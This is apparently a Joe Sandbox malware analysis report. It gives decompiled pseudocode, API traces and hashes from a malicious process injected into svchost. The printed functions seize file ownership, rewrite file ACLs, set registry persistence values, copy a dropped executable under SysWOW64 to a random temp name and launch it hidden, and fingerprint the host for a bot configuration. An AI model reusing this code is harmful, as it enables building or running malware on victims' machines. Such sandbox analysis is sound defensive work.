0x00327ab4
0x00327ab7
0x00327aba
0x00327ac2
0x00000000
0x00327ac4
0x00327adc
0x00327adf
0x00327ae5
0x00327ae7
0x00327da7
0x00327daa
0x00000000
0x00327aed
0x00327b0c
0x00327b13
0x00327b16
0x00327b1c
0x00327b1e
0x00000000
0x00000000
0x00327b34
0x00327b3b
0x00327b41
0x00327b43
0x00000000
0x00000000
0x00327b59
0x00327b5f
0x00327b61
0x00327bb8
0x00327bcb
0x00327bce
0x00327bd4
0x00327bd6
0x00327da6
0x00000000
0x00327da6
0x00327bdc
0x00327bdf
0x00327be1
0x00000000
0x00000000
0x00327be9
0x00327beb
0x00327bee
0x00327bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00327bf8
0x00327bf8
0x00327c00
0x00327c06
0x00327c08
0x00327cc6
0x00327cc6
0x00327cc6
0x00327cc6
0x00000000
0x00327cc6
0x00327c14
0x00327c16
0x00327c19
0x00327c1b
0x00327c4f
0x00327c4f
0x00327c52
0x00327c57
0x00327c5e
0x00327c5e
0x00327c5e
0x00327c66
0x00327c6c
0x00327c6f
0x00327c71
0x00327c86
0x00327c73
0x00327c78
0x00327c7f
0x00327c7f
0x00327c8b
0x00327c8e
0x00327c90
0x00327c93
0x00327c96
0x00327c96
0x00327c9d
0x00327c9f
0x00327ca7
0x00327ca7
0x00327ca9
0x00327cac
0x00327cb2
0x00327cb2
0x00327cb5
0x00327cc3
0x00000000
0x00327ca1
0x00327ca1
0x00327ca5
0x00000000
0x00000000
0x00000000
0x00327ca5
0x00000000
0x00000000
0x00000000
0x00327c1d
0x00327c1d
0x00327c27
0x00327c2d
0x00327c2f
0x00000000
0x00000000
0x00327c31
0x00327c32
0x00327c34
0x00000000
0x00000000
0x00000000
0x00327c34
0x00327c36
0x00327c38
0x00000000
0x00000000
0x00327c40
0x00327c46
0x00327cc9
0x00327cc9
0x00327cd0
0x00327cd0
0x00327cd9
0x00327cdc
0x00000000
0x00000000
0x00327ce2
0x00327ce8
0x00327d5a
0x00327d61
0x00327d6a
0x00327d6c
0x00327d6e
0x00327d72
0x00327d78
0x00327d7a
0x00327d82
0x00327d88
0x00327d8a
0x00327d92
0x00327d98
0x00327d9a
0x00327d9c
0x00327d9c
0x00327d9a
0x00327d8a
0x00327da0
0x00327da0
0x00000000
0x00327d6e
0x00327cea
0x00327cf0
0x00000000
0x00000000
0x00327cff
0x00327d05
0x00327d0b
0x00327d0d
0x00000000
0x00000000
0x00327d0f
0x00327d14
0x00327d16
0x00327d19
0x00327d19
0x00327d1b
0x00327d1c
0x00327d1c
0x00327d4a
0x00327d50
0x00327d52
0x00327d54
0x00327d54
0x00000000
0x00327d52
0x00327b6a
0x00327b70
0x00327b72
0x00000000
0x00000000
0x00327b7b
0x00327b84
0x00327b86
0x00327b88
0x00327b8c
0x00327b92
0x00327b94
0x00327b9c
0x00327ba2
0x00327ba4
0x00327bab
0x00327bab
0x00327ba4
0x00327bb2
0x00327bb2
0x00000000
0x00327b88

APIs

RegOpenKeyExA.KERNELBASE(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00327ABA
GetUserNameA.ADVAPI32(?,?), ref: 00327ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0033070C,?,?,?), ref: 00327B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00327B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00327B59
EqualSid.ADVAPI32(?,00000022), ref: 00327B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00327B7E
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00327B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00327B9C
RegSetKeySecurity.KERNELBASE(00000000,00000001,00000000), ref: 00327BAB
LocalFree.KERNEL32(00000000), ref: 00327BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00327FC9,?,00000000), ref: 00327BCE

Strings

C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00327CE2, 00327D0F, 00327D23, 00327D24
D, xrefs: 00327B0C

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe$D
API String ID: 2976863881-1954293302
Opcode ID: aa254cf2a704c8c0fa74cecbf74d9977cada3f7cd2b54ab1d9f8716e5f9f69ab
Instruction ID: e49238183f596a330357fe8766540cb0f7b719268dd76d8f1ad55ade54f55903
Opcode Fuzzy Hash: aa254cf2a704c8c0fa74cecbf74d9977cada3f7cd2b54ab1d9f8716e5f9f69ab
Instruction Fuzzy Hash: E5A15972A04229AFDF169FA4EC98FEEBBBCFF44700F154069E905E2150E7359A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00327809, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00327809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				int _t87;
				int _t95;
				int _t100;
				struct _ACL* _t110;
				int _t116;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				_t87 = GetUserNameA( &_v384,  &_v36); // executed
				if(_t87 == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				_t95 = LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56); // executed
				if(_t95 == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				_t100 = GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44); // executed
				if(_t100 == 0) {
					goto L42;
				}
				if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
					_v36 = 0x80;
					_v40 = 0x80;
					if(EqualSid( &_v128, _v16) == 0) {
						_v28 = 1;
						_t155 = LocalAlloc(0x40, 0x14);
						if(_t155 != 0) {
							if(InitializeSecurityDescriptor(_t155, 1) != 0 && SetSecurityDescriptorOwner(_t155,  &_v128, 0) != 0) {
								SetFileSecurityA(_a4, 1, _t155); // executed
							}
							LocalFree(_t155);
						}
					}
				}
				_v24 = _t141;
				if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
					L41:
					goto L42;
				}
				_t110 = _v20;
				if(_t110 == _t141) {
					goto L41;
				}
				_v8 = _v8 & _t141;
				if(0 >= _t110->AceCount) {
					goto L41;
				} else {
					goto L13;
				}
				do {
					L13:
					if(GetAce(_t110, _v8,  &_v12) == 0) {
						L32:
						_v8 = _v8 + 1;
						goto L33;
					}
					_t153 = 0;
					_v16 = _v12 + 8;
					if(_t141 <= 0) {
						L19:
						if(_t141 < 0x20) {
							 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
							_t141 = _t141 + 1;
						}
						_t120 = EqualSid( &_v128, _v16);
						_t146 = _v12;
						if(_t120 == 0) {
							_t121 = 0x1200a8;
						} else {
							asm("sbb eax, eax");
							_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
						}
						if( *((intOrPtr*)(_t146 + 4)) != _t121) {
							 *((intOrPtr*)(_t146 + 4)) = _t121;
							_t146 = _v12;
							_v24 = 1;
						}
						if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
							 *_t146 = 0;
							_t66 = _v16 + 8; // 0xc8685f74
							_t123 =  *_t66;
							if(_t123 != 0) {
								 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
							} else {
								 *((char*)(_v12 + 1)) = 0xb;
							}
							_v24 = 1;
						}
						goto L32;
					}
					while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
						_t153 = _t153 + 1;
						if(_t153 < _t141) {
							continue;
						}
						break;
					}
					if(_t153 >= _t141) {
						goto L19;
					}
					DeleteAce(_v20, _v8);
					_v24 = 1;
					L33:
					_t110 = _v20;
				} while (_v8 < (_t110->AceCount & 0x0000ffff));
				if(_v24 != 0) {
					_v28 = 1;
					_t154 = LocalAlloc(0x40, 0x14);
					if(_t154 != 0) {
						if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0) {
							_t116 = SetFileSecurityA(_a4, 4, _t154); // executed
							if(_t116 != 0) {
								_v28 = 1;
							}
						}
						LocalFree(_t154);
					}
				}
				goto L41;
			}

0x0032781e
0x00327826
0x00327829
0x0032782c
0x0032782f
0x00327837
0x00327a8e
0x00327a94
0x00327a94
0x0032785c
0x00327863
0x00327866
0x0032786e
0x00000000
0x00000000
0x0032787e
0x0032788b
0x0032789a
0x003278a2
0x00000000
0x00000000
0x003278c3
0x003278cc
0x003278cf
0x003278da
0x003278e0
0x003278e9
0x003278ed
0x003278f9
0x00327910
0x00327910
0x00327917
0x00327917
0x003278ed
0x003278da
0x00327930
0x0032793b
0x00327a8d
0x00000000
0x00327a8d
0x00327941
0x00327946
0x00000000
0x00000000
0x0032794c
0x00327955
0x00000000
0x00000000
0x00000000
0x00000000
0x0032795b
0x0032795b
0x0032796b
0x00327a2a
0x00327a2a
0x00000000
0x00327a2a
0x00327977
0x00327979
0x0032797e
0x003279ae
0x003279b1
0x003279b6
0x003279bd
0x003279bd
0x003279c5
0x003279cb
0x003279d0
0x003279e5
0x003279d2
0x003279d7
0x003279de
0x003279de
0x003279ed
0x003279ef
0x003279f2
0x003279f5
0x003279f5
0x003279fb
0x00327a03
0x00327a09
0x00327a09
0x00327a0e
0x00327a24
0x00327a10
0x00327a13
0x00327a13
0x00327a27
0x00327a27
0x00000000
0x003279fb
0x00327980
0x00327994
0x00327997
0x00000000
0x00000000
0x00000000
0x00327997
0x0032799b
0x00000000
0x00000000
0x003279a3
0x003279a9
0x00327a2d
0x00327a2d
0x00327a34
0x00327a41
0x00327a47
0x00327a50
0x00327a54
0x00327a60
0x00327a79
0x00327a81
0x00327a83
0x00327a83
0x00327a81
0x00327a87
0x00327a87
0x00327a54
0x00000000

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0032782F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00327866
GetLengthSid.ADVAPI32(?), ref: 00327878
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0032789A
GetSecurityDescriptorOwner.ADVAPI32(?,00327F63,?), ref: 003278B8
EqualSid.ADVAPI32(?,00327F63), ref: 003278D2
LocalAlloc.KERNEL32(00000040,00000014), ref: 003278E3
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 003278F1
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00327901
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00327910
LocalFree.KERNEL32(00000000), ref: 00327917
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00327933
GetAce.ADVAPI32(?,00000000,?), ref: 00327963
EqualSid.ADVAPI32(?,00327F63), ref: 0032798A
DeleteAce.ADVAPI32(?,00000000), ref: 003279A3
EqualSid.ADVAPI32(?,00327F63), ref: 003279C5
LocalAlloc.KERNEL32(00000040,00000014), ref: 00327A4A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00327A58
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00327A69
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00327A79
LocalFree.KERNEL32(00000000), ref: 00327A87

Strings

D, xrefs: 0032785C

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: 15790b4ab8da2925a17879ea5aac74cd3324869894bbcf7f43087f104997ea47
Instruction ID: 74584ca2475a4d876d1af5dd76a400ab26d0c16ede709e7c8d8d26b6827574af
Opcode Fuzzy Hash: 15790b4ab8da2925a17879ea5aac74cd3324869894bbcf7f43087f104997ea47
Instruction Fuzzy Hash: 22813B71D04229ABDB26CFA5ED84FEEBBBCBF08740F15416AE505E2250D7349A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00328328, Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00328328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00327DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00326EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x332c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x332c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00322544(0x3322f8,  &E003306AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00322544(0x3322f8,  &E003306AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0032EE2A(_t173, 0x3322f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0032EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x332c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x332c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x332c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0032EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x332c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0032EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0032EED1(_v8,  *0x332c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E003273FF(_t173, 0x330264, 0, 0,  &_v388,  &_v60); // executed
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x332159 - 0x60;
						if( *0x332159 < 0x60) {
							L18:
							E0032EE2A(_t180, 0x3322f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x332cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00326BA7(0x332cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x332cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0032EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00327E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x332cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0032EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0032EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x332cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00327FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00327EE6(_t174);
										E00327EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x332cd8);
								_t113 = E00328274(0x332cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0032ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00322544(0x3322f8, 0x330694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x332cd8; // 0x0
									E0032EF00(_t69, _t117);
									E0032EE2A(_t177, 0x3322f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0032ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x332cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0032675C("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v20, 0); // executed
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x3321a4; // 0x4c800
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E003224C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x3322d4 - _t128; // 0xe4db185b
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00322544(0x3322f8, 0x330710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // executed
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // executed
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}

0x00328328
0x00328328
0x00328334
0x0032833e
0x00000000
0x00328342
0x0032834a
0x00328354
0x00328356
0x0032846b
0x0032846e
0x00328474
0x00000000
0x00000000
0x0032847a
0x00328480
0x00000000
0x00000000
0x003284a2
0x003284ad
0x003284b6
0x003284b8
0x003284ba
0x00328543
0x0032855f
0x00328564
0x0032856d
0x0032856f
0x00328571
0x003285a5
0x003285ac
0x003285b1
0x003285b4
0x003285b7
0x003285bc
0x003285c1
0x00000000
0x003285b7
0x00328573
0x00328579
0x0032857b
0x0032857b
0x0032857e
0x0032857e
0x00328580
0x00328581
0x00328581
0x00328587
0x00328587
0x00328596
0x0032859f
0x00000000
0x0032859f
0x003284d3
0x003284d9
0x003284db
0x003284dd
0x003284e1
0x003284e3
0x003284e6
0x003284eb
0x003284f0
0x003284f1
0x003284f4
0x003284f6
0x003284f8
0x0032850b
0x00328511
0x00328513
0x00328518
0x0032851d
0x0032851e
0x0032851e
0x00328513
0x003284f6
0x003284e6
0x003284e1
0x00328524
0x0032852a
0x0032852d
0x00328538
0x0032853e
0x0032853f
0x00328541
0x00000000
0x00000000
0x00328541
0x00000000
0x0032835c
0x0032836e
0x00328373
0x00328376
0x00328378
0x00328464
0x00328464
0x00328779
0x00000000
0x0032877a
0x0032837e
0x00328384
0x00000000
0x00000000
0x0032838a
0x0032838d
0x00000000
0x00328393
0x00328393
0x00328399
0x0032839c
0x0032839c
0x0032839e
0x0032839f
0x0032839f
0x003283a5
0x003283ac
0x003283af
0x003283b1
0x003283b1
0x003283b3
0x003283ba
0x00328450
0x00328457
0x0032845c
0x003285c2
0x003285c2
0x003285c5
0x003285c8
0x003285ce
0x00328615
0x0032861a
0x00328620
0x003286a7
0x003286a8
0x003286ad
0x003286ae
0x003286b0
0x00328762
0x00328762
0x00328768
0x00328768
0x0032876b
0x00328770
0x00328775
0x00328778
0x00328778
0x00000000
0x00328778
0x003286b6
0x003286bb
0x003286bd
0x0032875b
0x0032875c
0x00000000
0x0032875c
0x003286c5
0x003286cc
0x003286d8
0x003286db
0x003286eb
0x003286f2
0x003286ff
0x00328705
0x0032870d
0x00328714
0x00328733
0x00328739
0x0032873b
0x0032874f
0x00328755
0x00000000
0x0032875a
0x00328746
0x0032874b
0x00000000
0x0032874b
0x0032862c
0x00328633
0x00328638
0x00328639
0x00328644
0x00328647
0x0032864a
0x0032864c
0x00328671
0x00328683
0x0032868c
0x00328693
0x0032869f
0x003286a4
0x00000000
0x00000000
0x00000000
0x00000000
0x0032864e
0x0032864e
0x0032864e
0x00328657
0x0032865d
0x00328660
0x00328663
0x00328666
0x0032866c
0x0032866c
0x00000000
0x0032864e
0x003285da
0x003285df
0x003285e2
0x003285e5
0x003285eb
0x00000000
0x00000000
0x003285ed
0x003285ef
0x00000000
0x00000000
0x003285f4
0x003285fa
0x00000000
0x00000000
0x00328601
0x00328606
0x00328609
0x0032860f
0x00000000
0x00000000
0x00000000
0x0032860f
0x003283c2
0x003283df
0x003283e2
0x003283e5
0x003283ea
0x003283f3
0x003283f9
0x003283fb
0x00000000
0x00000000
0x00328414
0x0032841a
0x0032841c
0x0032842d
0x0032843e
0x00328441
0x00328447
0x0032844a
0x00000000
0x0032844a
0x0032841e
0x00328421
0x00000000
0x00000000
0x00328423
0x00328426
0x00000000
0x00000000
0x00328428
0x0032842b
0x00000000
0x00000000
0x00000000
0x0032842b
0x0032838d

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000103,00330750,?,?,00000000,localcfg,00000000), ref: 003283F3
RegQueryValueExA.KERNELBASE(00330750,?,00000000,?,00328893,?,?,?,00000000,00000103,00330750,?,?,00000000,localcfg,00000000), ref: 00328414
RegSetValueExA.KERNELBASE(00330750,?,00000000,00000004,00328893,00000004,?,?,00000000,00000103,00330750,?,?,00000000,localcfg,00000000), ref: 00328441
RegCloseKey.ADVAPI32(00330750,?,?,00000000,00000103,00330750,?,?,00000000,localcfg,00000000), ref: 0032844A

Strings

localcfg, xrefs: 00328348
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 003285C8, 003285D5, 003285E5

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe$localcfg
API String ID: 237177642-4179292358
Opcode ID: 079267874638af0ccc537791959ec6ab8775cfbc147e5e7b35669e91e20b2d7a
Instruction ID: d785c8144611e16e2d5a62354590692b65f4d07bd351358863ab6329bc5864ad
Opcode Fuzzy Hash: 079267874638af0ccc537791959ec6ab8775cfbc147e5e7b35669e91e20b2d7a
Instruction Fuzzy Hash: DAC190B1D41229BFEB17AFA4ECC6EEF7BBCEB05700F154465F601A6051EA705E848B21

Uniqueness

Uniqueness Score: -1.00%

Function 00321D96, Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00321D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0032EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192); // executed
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0032E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0032E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0032DF70(1, "work_srv");
					E0032DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0032EA84(1, _t104, _t92, 0); // executed
				_t93 = 0;
				_t63 = E0032E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				_t64 = E0032199C(_t63); // executed
				if(_t64 == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0032E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0032F04E(_t93);
					E0032EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0032E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_t77 = E00321B71(); // executed
					_v200 = _t77;
					E0032EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
